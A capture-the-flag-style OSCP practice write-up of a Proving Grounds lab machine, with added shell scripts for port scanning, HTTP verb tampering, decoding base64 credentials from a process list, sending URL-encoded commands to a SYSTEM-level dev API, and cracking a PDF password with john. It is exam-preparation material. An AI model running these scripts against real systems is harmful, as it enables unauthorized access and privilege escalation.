OSCP Practice Sensitive Information Disclosure
October 2022 is OSCP practice month. I am reviewing Proving Grounds machines in prep for what I think could be my last exam attempt. I will do a write-up for each machine, but won't post the complete exploit chain. The title will only name a specific type of vulnerability, followed by a high-level summary of the attack path and a basic breakdown of the method I used to exploit the machine. I think a lot of people don't want it to be easy to find exact write-ups for the boxes; if people do want that, there is a write-up and hints on the Proving Grounds site.
NMAP for Initial Port Scans
For my initial NMAP scans to check open ports, I run a really simple script. Previously I had tested some automated enumeration tools. They generally provided more information than I needed, and most of it wasn't useful for me. Now, for OSCP-type boxes, I kick off my simple script: it runs a top-1000 TCP port scan with the -sC and -sV options set, then a full TCP port scan with no options, and then a top-100 UDP port scan. This is easy, covers the initial scanning, and makes sure I don't get distracted and forget to run the UDP scan or the full port scan.
If I get any interesting ports from my full scan, I will do another scan on them to get more information.
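As an added example of that routine (this is not the post's own script; the output layout under ./scans/<target> and the use of sudo for the UDP scan are my assumptions), here is a POSIX shell version: the top-1000 -sC -sV scan, the full TCP sweep, the top-100 UDP scan, and then a scripted -sC -sV pass over whatever the full sweep found open that the first scan did not already cover, pulled from nmap's grepable (.gnmap) output. Run with no arguments it only demonstrates the parsing step on constructed .gnmap lines, so it can be tried without a target.

```sh
#!/bin/sh
# Added example of the initial-scan routine described above; it is not the post's own
# script. Assumed (not from the post): results go under ./scans/<target> via -oA, and
# the UDP scan runs under sudo because raw sockets need root.
set -eu

# Extract the open TCP ports from an nmap grepable (.gnmap) file as "21,22,8089".
# nmap writes one line per host, e.g.
#   Host: 10.0.0.5 ()  Ports: 21/open/tcp//ftp///, 80/filtered/tcp//http///
# so matching only "/open/tcp" drops filtered and closed entries.
open_ports_from_gnmap() {
  grep -o '[0-9][0-9]*/open/tcp' "$1" | cut -d/ -f1 | sort -n | uniq |
    awk '{printf "%s%s", (NR > 1 ? "," : ""), $0} END {print ""}'
}

# Ports open in the full sweep ($1) that the top-1000 -sC -sV scan ($2) did not already
# cover; these are the "interesting" ones worth a second, scripted scan.
uncovered_ports() {
  {
    open_ports_from_gnmap "$2" | tr ',' '\n' | sed 's/^/seen /'
    open_ports_from_gnmap "$1" | tr ',' '\n' | sed 's/^/all /'
  } | awk '$2 == "" {next}
           $1 == "seen" {seen[$2] = 1; next}
           $1 == "all" && !($2 in seen) {printf "%s%s", (n++ ? "," : ""), $2}
           END {print ""}'
}

# The three scans from the post, then a -sC -sV pass over anything new from the sweep.
initial_scan() {
  target=$1; out=scans/$target
  mkdir -p "$out"
  nmap -sC -sV --top-ports 1000 -oA "$out/tcp-top1000" "$target"
  nmap -p- -oA "$out/tcp-all" "$target"
  sudo nmap -sU --top-ports 100 -oA "$out/udp-top100" "$target"
  ports=$(uncovered_ports "$out/tcp-all.gnmap" "$out/tcp-top1000.gnmap")
  if [ -n "$ports" ]; then
    nmap -sC -sV -p "$ports" -oA "$out/tcp-extra" "$target"
  fi
}

# With no arguments, show the parsing step on constructed .gnmap lines instead of scanning.
demo() {
  d=$(mktemp -d)
  printf 'Host: 10.0.0.5 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/filtered/tcp//http///\n' > "$d/top.gnmap"
  printf 'Host: 10.0.0.5 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 8089/open/tcp//unknown///, 33333/open/tcp//unknown///\n' > "$d/all.gnmap"
  echo "open in full sweep: $(open_ports_from_gnmap "$d/all.gnmap")"
  echo "not yet scripted:   $(uncovered_ports "$d/all.gnmap" "$d/top.gnmap")"
  rm -rf "$d"
}

if [ $# -eq 0 ]; then demo; else initial_scan "$1"; fi
```

The second pass only re-scans ports the top-1000 scan never touched, which keeps the follow-up short on a box like this one where the interesting services sit on high ports.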
On this host, port 8089 turned out being the most interesting port initially.
The DevOps Dashboard
The web server on port 8089 was running a dashboard with three buttons. Clicking them didn't appear to do anything, but looking at the page source showed that each button sends a request to a web server on port 33333.
Here we can see the endpoints those requests are sent to.
Sending a GET request to the web server on 33333 didn't return any sensitive information.
Trying HTTP verb tampering, though, sending a POST request to "list-running-procs" returned sensitive information.
A list of the machine's running processes is displayed to us. The first thing that stands out is a set of base64-encoded credentials for a user. Decoded, these credentials gave read access to the FTP server and user-level remote access over SSH.
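Two added helpers for the steps above, not the post's own tooling: one that replays a path with several HTTP methods and prints status and body size so a method that answers differently from the GET baseline stands out, and one that pulls base64-looking tokens out of a text blob such as a process list and prints only those that decode to readable text. The process list embedded for the demo is constructed (the credentials in it are a made-up dummy:Example1, not the box's real ones), and the endpoint name in the usage comment is the one from the post.

```sh
#!/bin/sh
# Added example, not the post's own tooling. The sample process list below is
# constructed; the real box's credentials are not reproduced.
set -eu

# Send the same path with several methods and print "METHOD endpoint status size"
# so a method that answers differently from the GET baseline (here: POST) stands out.
verb_tamper() {
  base=$1; shift
  for ep in "$@"; do
    for m in GET POST PUT PATCH DELETE OPTIONS; do
      res=$(curl -s -o /dev/null -w '%{http_code} %{size_download}' -X "$m" "$base/$ep")
      printf '%-7s %-22s %s\n' "$m" "$ep" "$res"
    done
  done
}

# Pull base64-looking tokens (16+ chars of the base64 alphabet, optional padding)
# out of text and print only those that decode to printable text.
decode_b64_tokens() {
  printf '%s\n' "$1" | grep -oE '[A-Za-z0-9+/]{16,}={0,2}' | while read -r tok; do
    dec=$(printf '%s' "$tok" | base64 -d 2>/dev/null | tr -d '\r\n' || true)
    case $dec in
      '' | *[![:print:]]*) ;;        # empty or binary junk: not a credential
      *) printf '%s\n' "$dec" ;;
    esac
  done
}

# Constructed stand-in for the list-running-procs response; the -Auth value is
# base64("dummy:Example1").
SAMPLE_PROCS='ProcessName     CommandLine
svchost.exe     C:\Windows\System32\svchost.exe -k netsvcs
powershell.exe  powershell.exe -File C:\DevOps\ws33333.ps1
powershell.exe  powershell.exe -File C:\DevOps\sync.ps1 -Auth ZHVtbXk6RXhhbXBsZTE=
powershell.exe  powershell.exe -File C:\DevOps\ws80.ps1'

if [ $# -eq 0 ]; then
  decode_b64_tokens "$SAMPLE_PROCS"          # prints dummy:Example1
else
  verb_tamper "$@"                           # e.g. ./verbs.sh http://TARGET:33333 list-running-procs
fi
```

The size column matters as much as the status code: a 200 with a body a few hundred bytes longer than the GET response is exactly the "looks the same, isn't" case that verb tampering is meant to surface.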
The process list also shows that another web server is running: there is a ws80.ps1 alongside ws8089.ps1 and ws33333.ps1. Those two are the web servers on 8089 and 33333, so it is worth checking for a third one on port 80 of localhost from the SSH shell.
Running netstat -ano on the host confirms that port 80 is listening.
Sending a request to port 80 with curl identifies it as a dev-api. The responses would identify the machine, so I'm not reproducing them here, but the short version is that we can URL-encode commands and pass them to the API, which executes them. The API runs as NT AUTHORITY\SYSTEM, which gives us privilege escalation.
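An added example of the encoding step, not the post's own commands: the post only says that the dev-api on port 80 executes URL-encoded commands, so the path (/dev-api) and the query parameter (cmd) below are hypothetical placeholders to replace with whatever the real responses show. The urlencode function is a plain percent-encoder for ASCII command lines; curl's --data-urlencode would do the same job, but writing it out shows exactly which bytes need encoding before they hit the API.

```sh
#!/bin/sh
# Added example, not the post's own commands. API_URL and the "cmd" parameter are
# hypothetical placeholders; the post does not name the real path or parameter.
set -eu

# Percent-encode a string for a URL query (RFC 3986 unreserved characters pass
# through). Walks the input one character at a time; intended for ASCII command lines.
urlencode() {
  s=$1; out=
  while [ -n "$s" ]; do
    c=${s%"${s#?}"}      # first character of the remaining input
    s=${s#?}             # drop it from the input
    case $c in
      [A-Za-z0-9._~-]) out=$out$c ;;
      *) out=$out$(printf '%%%02X' "'$c") ;;   # "'c" makes printf emit the char's code
    esac
  done
  printf '%s\n' "$out"
}

API_URL=${API_URL:-http://127.0.0.1/dev-api}   # hypothetical path on the localhost-only server

# Run one command through the API and print whatever it answers.
run_via_api() {
  curl -s "$API_URL?cmd=$(urlencode "$1")"
}

# Quick check of who the API runs as (the post reports NT AUTHORITY\SYSTEM).
api_identity() {
  run_via_api whoami
}

if [ $# -eq 0 ]; then
  urlencode 'whoami /priv'          # prints whoami%20%2Fpriv
else
  run_via_api "$*"                  # e.g. ./api.sh net user
fi
```

Note that spaces and slashes are the characters most likely to break a naive request, so encoding them is the difference between the API running "whoami /priv" and running nothing.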
What if we didn’t notice the other web server
If we didn't notice the web server, there was another piece of sensitive information we could find. Looking on the FTP server, I found a PDF file. The file was password-protected, but we could get at it by cracking the password. The tool pdf2john.pl is on Kali by default and gives us a hash to crack with john. Once the hash is cracked, the PDF tells us there is an API on port 80 that executes commands. That should help anyone who didn't see the server earlier, and should be the intended way to find it.
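The PDF step as an added example, not the post's own commands: hash the file with pdf2john.pl, crack it with john against a wordlist, read the recovered password back from john --show, and dump the document text with pdftotext. The paths for pdf2john.pl and rockyou.txt are the Kali defaults and can be overridden through the environment; the PDF name and the john --show output used by the no-argument demo are constructed.

```sh
#!/bin/sh
# Added example of the PDF step, not the post's own commands. Assumed: Kali's
# /usr/share/john/pdf2john.pl and /usr/share/wordlists/rockyou.txt (overridable via
# PDF2JOHN and WORDLIST); the sample john --show output in demo is constructed.
set -eu

PDF2JOHN=${PDF2JOHN:-/usr/share/john/pdf2john.pl}
WORDLIST=${WORDLIST:-/usr/share/wordlists/rockyou.txt}

# Turn the PDF's encryption dictionary into a john hash line ("file.pdf:$pdf$...").
pdf_hash() {
  perl "$PDF2JOHN" "$1"
}

# Parse `john --show` output ("file.pdf:password", blank line, summary) and print the
# password; -f2- keeps passwords that themselves contain a colon.
john_show_password() {
  grep -m1 ':' | cut -d: -f2-
}

# Full chain: hash, crack, then print the text using the recovered user password.
crack_and_read_pdf() {
  pdf=$1; hashfile=${pdf##*/}.hash
  pdf_hash "$pdf" > "$hashfile"
  john --wordlist="$WORDLIST" "$hashfile" >/dev/null
  pw=$(john --show "$hashfile" | john_show_password)
  [ -n "$pw" ] || { echo "password not in wordlist" >&2; return 1; }
  echo "password: $pw" >&2
  pdftotext -upw "$pw" "$pdf" -        # "-" sends the decrypted text to stdout
}

# Without a PDF to hand, show the parsing step on constructed `john --show` output.
demo() {
  printf 'secret.pdf:Winter2022\n\n1 password hash cracked, 0 left\n' | john_show_password
}

if [ $# -eq 0 ]; then demo; else crack_and_read_pdf "$1"; fi
```

pdf2john.pl only extracts the encryption parameters; nothing in the PDF is decrypted until pdftotext is run with the cracked user password, so a failed crack leaves you with the hash file and nothing else to read.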